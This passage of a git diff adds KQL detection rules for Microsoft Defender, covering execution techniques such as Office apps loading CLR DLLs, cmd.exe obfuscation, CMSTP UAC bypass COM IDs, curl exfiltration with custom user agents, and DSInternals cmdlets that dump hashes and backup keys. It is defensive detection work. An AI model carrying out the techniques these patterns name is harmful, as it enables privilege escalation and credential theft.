"\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql new file mode 100644 index 00000000..a592813f --- /dev/null +++ b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql @@ -0,0 +1,10 @@ +// Title: CLR DLL Loaded Via Office Applications +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: medium +// Description: Detects CLR DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents +| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql new file mode 100644 index 00000000..54471fa2 --- /dev/null +++ b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql @@ -0,0 +1,12 @@ +// Title: Cmd.EXE Missing Space Characters Execution Anomaly +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-23 +// Level: high +// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. +This could be a sign of obfuscation of a fat finger problem (typo by the developer). + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r ")))) \ No newline at end of file diff --git a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql new file mode 100644 index 00000000..5f2d0335 --- /dev/null +++ b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql @@ -0,0 +1,12 @@ +// Title: CMSTP UAC Bypass via COM Object Access +// Author: Nik Seetharaman, Christian Burkard (Nextron Systems) +// Date: 2019-07-31 +// Level: high +// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceProcessEvents +| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql new file mode 100644 index 00000000..dbf199d3 --- /dev/null +++ b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql @@ -0,0 +1,12 @@ +// Title: Command Line Execution with Suspicious URL and AppData Strings +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105 +// False Positives: +// - High + +DeviceProcessEvents +| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql new file mode 100644 index 00000000..0683ba40 --- /dev/null +++ b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql @@ -0,0 +1,10 @@ +// Title: Computer Password Change Via Ksetup.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-06 +// Level: medium +// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe" +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql new file mode 100644 index 00000000..ab3422d1 --- /dev/null +++ b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql @@ -0,0 +1,12 @@ +// Title: Conhost.exe CommandLine Path Traversal +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-14 +// Level: high +// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost" \ No newline at end of file diff --git a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql new file mode 100644 index 00000000..912ec61c --- /dev/null +++ b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql @@ -0,0 +1,10 @@ +// Title: Conhost Spawned By Uncommon Parent Process +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-28 +// Level: medium +// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC" or InitiatingProcessCommandLine contains "-k wusvcs -p -s WaaSMedicSvc"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql new file mode 100644 index 00000000..1fab717d --- /dev/null +++ b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql @@ -0,0 +1,10 @@ +// Title: Csc.EXE Execution Form Potentially Suspicious Parent +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2019-02-11 +// Level: high +// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004 + +DeviceProcessEvents +| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql new file mode 100644 index 00000000..15912d84 --- /dev/null +++ b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql @@ -0,0 +1,14 @@ +// Title: Cscript/Wscript Potentially Suspicious Child Process +// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86') +// Date: 2023-05-15 +// Level: medium +// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. +Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. + +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith "\\rundll32.exe" or ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and ((ProcessCommandLine contains "mshta" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec")))) and (not(((ProcessCommandLine contains "UpdatePerUserSystemParameters" or ProcessCommandLine contains "PrintUIEntry" or ProcessCommandLine contains "ClearMyTracksByProcess") and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql new file mode 100644 index 00000000..f7954e93 --- /dev/null +++ b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql @@ -0,0 +1,10 @@ +// Title: Cscript/Wscript Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/csexec_service_file_creation.kql b/KQL/rules/Execution/csexec_service_file_creation.kql new file mode 100644 index 00000000..1820c971 --- /dev/null +++ b/KQL/rules/Execution/csexec_service_file_creation.kql @@ -0,0 +1,10 @@ +// Title: CSExec Service File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-04 +// Level: medium +// Description: Detects default CSExec service filename which indicates CSExec service installation and execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 + +DeviceFileEvents +| where FolderPath endswith "\\csexecsvc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql new file mode 100644 index 00000000..03909a9d --- /dev/null +++ b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql @@ -0,0 +1,10 @@ +// Title: Curl Web Request With Potential Custom User-Agent +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql new file mode 100644 index 00000000..a46b9780 --- /dev/null +++ b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql @@ -0,0 +1,14 @@ +// Title: Data Export From MSSQL Table Via BCP.EXE +// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-08-20 +// Level: medium +// Description: Detects the execution of the BCP utility in order to export data from the database. +Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.exfiltration, attack.t1048 +// False Positives: +// - Legitimate data export operations. + +DeviceProcessEvents +| where (ProcessCommandLine contains " out " or ProcessCommandLine contains " queryout ") and (FolderPath endswith "\\bcp.exe" or ProcessVersionInfoOriginalFileName =~ "BCP.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql new file mode 100644 index 00000000..49d4519c --- /dev/null +++ b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql @@ -0,0 +1,14 @@ +// Title: Detection of PowerShell Execution via Sqlps.exe +// Author: Agro (@agro_sev) oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. +Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 +// False Positives: +// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql new file mode 100644 index 00000000..fd2e17ce --- /dev/null +++ b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql @@ -0,0 +1,10 @@ +// Title: DotNET Assembly DLL Loaded Via Office Application +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: medium +// Description: Detects any assembly DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents +| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql new file mode 100644 index 00000000..ceede2b3 --- /dev/null +++ b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql @@ -0,0 +1,14 @@ +// Title: DSInternals Suspicious PowerShell Cmdlets +// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri +// Date: 2024-06-26 +// Level: high +// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. +The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate usage of DSInternals for administration or audit purpose. + +DeviceProcessEvents +| where ProcessCommandLine contains "Add-ADDBSidHistory" or ProcessCommandLine contains "Add-ADNgcKey" or ProcessCommandLine contains "Add-ADReplNgcKey" or ProcessCommandLine contains "ConvertFrom-ADManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-GPPrefPassword" or ProcessCommandLine contains "ConvertFrom-ManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-UnattendXmlPassword" or ProcessCommandLine contains "ConvertFrom-UnicodePassword" or ProcessCommandLine contains "ConvertTo-AADHash" or ProcessCommandLine contains "ConvertTo-GPPrefPassword" or ProcessCommandLine contains "ConvertTo-KerberosKey" or ProcessCommandLine contains "ConvertTo-LMHash" or ProcessCommandLine contains "ConvertTo-MsoPasswordHash" or ProcessCommandLine contains "ConvertTo-NTHash" or ProcessCommandLine contains "ConvertTo-OrgIdHash" or ProcessCommandLine contains "ConvertTo-UnicodePassword" or ProcessCommandLine contains "Disable-ADDBAccount" or ProcessCommandLine contains "Enable-ADDBAccount" or ProcessCommandLine contains "Get-ADDBAccount" or ProcessCommandLine contains "Get-ADDBBackupKey" or ProcessCommandLine contains "Get-ADDBDomainController" or ProcessCommandLine contains "Get-ADDBGroupManagedServiceAccount" or ProcessCommandLine contains "Get-ADDBKdsRootKey" or ProcessCommandLine contains "Get-ADDBSchemaAttribute" or ProcessCommandLine contains "Get-ADDBServiceAccount" or ProcessCommandLine contains "Get-ADDefaultPasswordPolicy" or ProcessCommandLine contains "Get-ADKeyCredential" or ProcessCommandLine contains "Get-ADPasswordPolicy" or ProcessCommandLine contains "Get-ADReplAccount" or ProcessCommandLine contains "Get-ADReplBackupKey" or ProcessCommandLine contains "Get-ADReplicationAccount" or ProcessCommandLine contains "Get-ADSIAccount" or ProcessCommandLine contains "Get-AzureADUserEx" or ProcessCommandLine contains "Get-BootKey" or ProcessCommandLine contains "Get-KeyCredential" or ProcessCommandLine contains "Get-LsaBackupKey" or ProcessCommandLine contains "Get-LsaPolicy" or ProcessCommandLine contains "Get-SamPasswordPolicy" or ProcessCommandLine contains "Get-SysKey" or ProcessCommandLine contains "Get-SystemKey" or ProcessCommandLine contains "New-ADDBRestoreFromMediaScript" or ProcessCommandLine contains "New-ADKeyCredential" or ProcessCommandLine contains "New-ADNgcKey" or ProcessCommandLine contains "New-NTHashSet" or ProcessCommandLine contains "Remove-ADDBObject" or ProcessCommandLine contains "Save-DPAPIBlob" or ProcessCommandLine contains "Set-ADAccountPasswordHash" or ProcessCommandLine contains "Set-ADDBAccountPassword" or ProcessCommandLine contains "Set-ADDBBootKey" or ProcessCommandLine contains "Set-ADDBDomainController" or ProcessCommandLine contains "Set-ADDBPrimaryGroup" or ProcessCommandLine contains "Set-ADDBSysKey" or ProcessCommandLine contains "Set-AzureADUserEx" or ProcessCommandLine contains "Set-LsaPolicy" or ProcessCommandLine contains "Set-SamAccountPasswordHash" or ProcessCommandLine contains "Set-WinUserPasswordHash" or ProcessCommandLine contains "Test-ADDBPasswordQuality" or ProcessCommandLine contains "Test-ADPasswordQuality" or ProcessCommandLine contains "Test-ADReplPasswordQuality" or ProcessCommandLine contains "Test-PasswordQuality" or ProcessCommandLine contains "Unlock-ADDBAccount" or ProcessCommandLine contains "Write-ADNgcKey" or ProcessCommandLine contains "Write-ADReplNgcKey" \ No newline at end of file diff --git a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql new file mode 100644 index 00000000..07c258fb --- /dev/null +++ b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql @@ -0,0 +1,10 @@ +// Title: Enable BPF Kprobes Tracing +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-25 +// Level: medium +// Description: Detects common command used to enable bpf kprobes tracing +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents +| where (ProcessCommandLine contains "/myprobe/enable" or ProcessCommandLine contains "/myretprobe/enable") and (ProcessCommandLine contains "echo 1 >" and ProcessCommandLine contains "/sys/kernel/debug/tracing/events/kprobes/") \ No newline at end of file diff --git a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql new file mode 100644 index 00000000..97a80aa1 --- /dev/null +++ b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql @@ -0,0 +1,10 @@ +// Title: Enable Microsoft Dynamic Data Exchange +// Author: frack113 +// Date: 2022-02-26 +// Level: medium +// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559.002 + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE") \ No newline at end of file diff --git a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql new file mode 100644 index 00000000..f4bdd5fd --- /dev/null +++ b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi VM Kill Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "vm process" and ProcessCommandLine contains "kill") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql new file mode 100644 index 00000000..52739dd5 --- /dev/null +++ b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql @@ -0,0 +1,10 @@ +// Title: Exchange PowerShell Snap-Ins Usage +// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/execute_code_with_pester_bat.kql b/KQL/rules/Execution/execute_code_with_pester_bat.kql new file mode 100644 index 00000000..1269c58c --- /dev/null +++ b/KQL/rules/Execution/execute_code_with_pester_bat.kql @@ -0,0 +1,12 @@ +// Title: Execute Code with Pester.bat +// Author: Julia Fomina, oscd.community +// Date: 2020-10-08 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + 